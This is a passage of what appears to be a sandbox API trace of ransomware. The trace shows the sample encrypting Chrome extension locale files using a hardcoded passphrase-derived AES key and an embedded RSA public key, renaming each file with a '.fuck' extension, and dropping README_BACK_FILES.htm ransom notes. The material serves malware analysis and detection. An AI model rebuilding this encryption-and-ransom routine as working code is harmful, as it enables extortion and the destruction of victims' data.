(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0257.276] AreFileApisANSI () returned 1 [0257.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.276] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.277] GetFileType (hFile=0x5d50) returned 0x1 [0257.278] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.279] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.279] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.280] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.280] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.280] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.280] GetLastError () returned 0x0 [0257.280] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json")) returned 0x20 [0257.280] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json", dwFileAttributes=0x80) returned 1 [0257.280] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.281] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.282] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.282] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.284] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.284] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.284] CryptHashData (hHash=0x2e18128, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.284] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.284] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.284] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.285] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e15fc8) returned 1 [0257.285] CryptImportPublicKeyInfo (in: hCryptProv=0x2e15fc8, dwCertEncodingType=0x1, pInfo=0x2e2b830*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b860*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b868*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e1a028) returned 1 [0257.285] CryptEncrypt (in: hKey=0x2e1a028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.285] CryptEncrypt (in: hKey=0x2e1a028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15968*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15968*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.285] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e15968*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15968*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.286] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xb2, lpOverlapped=0x0) returned 1 [0257.287] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.287] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.287] CloseHandle (hObject=0x5d60) returned 1 [0257.287] CloseHandle (hObject=0x5d5c) returned 1 [0257.287] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json"), bFailIfExists=0) returned 1 [0257.290] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json", dwFileAttributes=0x0) returned 1 [0257.291] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json.gsg")) returned 1 [0257.292] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\messages.json.fuck")) returned 1 [0257.293] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.293] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.293] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.293] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.293] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.294] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\readme_back_files.htm")) returned 0xffffffff [0257.294] AreFileApisANSI () returned 1 [0257.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.294] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\is\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.295] GetFileType (hFile=0x5d50) returned 0x1 [0257.295] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.296] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.296] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.297] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.297] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.297] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.297] GetLastError () returned 0x0 [0257.297] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json")) returned 0x20 [0257.298] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0257.298] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.298] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.299] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.299] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.301] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.301] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.301] CryptHashData (hHash=0x2e18128, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.301] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.301] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.301] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.301] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16050) returned 1 [0257.302] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16050, dwCertEncodingType=0x1, pInfo=0x2e2b900*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b930*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b938*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19e28) returned 1 [0257.302] CryptEncrypt (in: hKey=0x2e19e28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.302] CryptEncrypt (in: hKey=0x2e19e28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15c10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15c10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.302] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e15c10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15c10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.303] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xb6, lpOverlapped=0x0) returned 1 [0257.304] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.304] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.304] CloseHandle (hObject=0x5d5c) returned 1 [0257.304] CloseHandle (hObject=0x5d60) returned 1 [0257.304] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0257.307] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0257.308] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json.gsg")) returned 1 [0257.309] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\messages.json.fuck")) returned 1 [0257.310] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.310] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.310] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.310] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.310] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.310] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0257.310] AreFileApisANSI () returned 1 [0257.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.310] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.311] GetFileType (hFile=0x5d50) returned 0x1 [0257.311] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.312] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.312] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.312] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.312] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.312] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.312] GetLastError () returned 0x0 [0257.313] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json")) returned 0x20 [0257.313] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json", dwFileAttributes=0x80) returned 1 [0257.313] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.314] CreateFileA 